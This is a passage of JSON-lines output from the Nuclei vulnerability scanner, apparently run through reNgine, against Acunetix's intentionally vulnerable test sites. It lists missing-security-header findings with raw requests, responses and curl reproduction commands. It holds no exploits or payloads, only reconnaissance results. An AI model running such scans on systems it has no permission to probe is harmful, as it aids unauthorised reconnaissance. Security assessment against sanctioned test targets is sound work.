charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e403 - Forbidden: Access is denied.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e403 - Forbidden: Access is denied.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eYou do not have permission to view this directory or page using the credentials that you supplied.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:49.90228148Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.929766553Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/.carousel\",\"path\":\"/.carousel\",\"matched-at\":\"http://testhtml5.vulnweb.com/.carousel\",\"request\":\"GET /.carousel HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 NOT FOUND\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.068008206Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testhtml5.vulnweb.com/admin\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 308 PERMANENT REDIRECT\\r\\nConnection: close\\r\\nContent-Length: 253\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nLocation: http://localhost/admin/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003eRedirecting...\\u003c/title\\u003e\\n\\u003ch1\\u003eRedirecting...\\u003c/h1\\u003e\\n\\u003cp\\u003eYou should be redirected automatically to target URL: \\u003ca href=\\\"http://localhost/admin/\\\"\\u003ehttp://localhost/admin/\\u003c/a\\u003e. If not click the link.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.068049961Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"path\":\"/static/app/libs/sessvars.js:202\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"request\":\"GET /static/app/libs/sessvars.js:202 HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.19576908Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testhtml5.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.195803521Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"path\":\"/CVS/Entries.Log\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"request\":\"GET /CVS/Entries.Log HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.195822084Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"path\":\"/static/app/libs/sessvars.js:105at\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"request\":\"GET /static/app/libs/sessvars.js:105at HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.330687816Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/contact\",\"path\":\"/contact\",\"matched-at\":\"http://testhtml5.vulnweb.com/contact\",\"request\":\"GET /contact HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.33074732Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can 